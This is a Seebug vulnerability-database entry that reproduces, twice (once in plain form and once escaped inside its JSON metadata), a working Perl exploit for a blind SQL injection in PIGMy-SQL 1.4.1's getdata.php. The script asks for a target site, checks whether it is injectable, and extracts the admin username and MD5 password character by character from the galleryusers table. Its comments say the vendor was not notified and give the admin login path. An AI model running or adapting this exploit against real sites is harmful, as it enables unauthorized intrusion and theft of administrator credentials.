ID SSV:65297 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
# - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -
# PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the..
# ..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job
#
# Discovered And Coded By: t0pP8uZz
# Discovered On: April 4 2008
# Vendor has not been notifed!
# Admin login is at /admin/
# passwords are encrypted in MD5
# END OF
use strict;
use LWP::Simple;
print "--------------------------------------------------\n";
print "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\n";
print "- Coded And Discovered By t0pP8uZz -\n";
print "- -\n";
print "- This exploit will obtain the admin user/pass.. -\n";
print "- ..Using a blind sql injection attack -\n";
print "--------------------------------------------------\n";
print "\nTarget Site: ";
chomp(my $url=<STDIN>);
print "Valid Photo ID: ";
chomp(my $pid=<STDIN>);
if(inject_test($url, $pid)) {
print "\nInjecting Please Wait.. This could take several minutes.\n";
my $result = blindattack($url, $pid);
print "Exploited! Admin Details Are: ".$result;
exit;
}
sub blindattack {
my $url = shift;
my $pid = shift;
my $done = 0;
my $substr = 1;
my $chr = 48;
my $res = undef;
while($done == 0) {
my $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*");
if($content =~ /#/ && $chr == 94) { $done = 1; }
elsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
return $res;
}
sub inject_test {
my $url = shift;
my $pid = shift;
my $true = get($url."/getdata.php?id=".$pid." and 1=1");
my $false = get($url."/getdata.php?id=".$pid." and 1=2");
if($true =~ /#/ && $false !~ /#/) {
print "\nTarget Vulnerable!";
return 1;
}
else {
print "Target not vulnerable! die'ing!";
exit;
}
}
# milw0rm.com [2008-04-04]
{"lastseen": "2017-11-19T13:34:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2017-11-19T13:34:29"}, "vulnersScore": 7.5}, "href": "https://www.seebug.org/vuldb/ssvid-65297", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:65297", "title": "PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 0, "sourceData": "\n #!/usr/bin/perl\r\n\r\n# - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\r\n# PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the..\r\n#\t..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job\r\n#\r\n# Discovered And Coded By: t0pP8uZz\r\n# Discovered On: April 4 2008\r\n# Vendor has not been notifed!\r\n# Admin login is at /admin/\r\n# passwords are encrypted in MD5\r\n# END OF\r\n\r\nuse strict;\r\nuse LWP::Simple;\r\n\r\nprint "--------------------------------------------------\\n";\r\nprint "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\\n";\r\nprint "- Coded And Discovered By t0pP8uZz -\\n";\r\nprint "- -\\n";\r\nprint "- This exploit will obtain the admin user/pass.. -\\n";\r\nprint "- ..Using a blind sql injection attack -\\n";\r\nprint "--------------------------------------------------\\n";\r\n\r\nprint "\\nTarget Site: ";\r\n\tchomp(my $url=<STDIN>);\r\n\t\r\nprint "Valid Photo ID: ";\r\n\tchomp(my $pid=<STDIN>);\r\n\r\nif(inject_test($url, $pid)) {\r\n\r\n\tprint "\\nInjecting Please Wait.. This could take several minutes.\\n";\r\n\tmy $result = blindattack($url, $pid);\r\n\tprint "Exploited! Admin Details Are: ".$result;\r\n\texit;\r\n}\r\n\r\nsub blindattack {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\tmy $done = 0;\r\n\tmy $substr = 1;\r\n\tmy $chr = 48;\r\n\tmy $res = undef;\r\n\t\r\n\twhile($done == 0) {\r\n\t\tmy $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*");\r\n\t\t\r\n\t\tif($content =~ /#/ && $chr == 94) { $done = 1; }\r\n\t\t\telsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }\r\n\t\t\t\telse { $chr++; }\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\nsub inject_test {\r\n\r\n\tmy $url = shift;\r\n\tmy $pid = shift;\r\n\t\r\n\tmy $true = get($url."/getdata.php?id=".$pid." and 1=1");\r\n\tmy $false = get($url."/getdata.php?id=".$pid." and 1=2");\r\n\t\r\n\tif($true =~ /#/ && $false !~ /#/) { \r\n\t\tprint "\\nTarget Vulnerable!";\r\n\t\treturn 1;\r\n\t}\r\n\telse {\r\n\t\tprint "Target not vulnerable! die'ing!";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\n# milw0rm.com [2008-04-04]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65297", "type": "seebug", "objectVersion": "1.4"}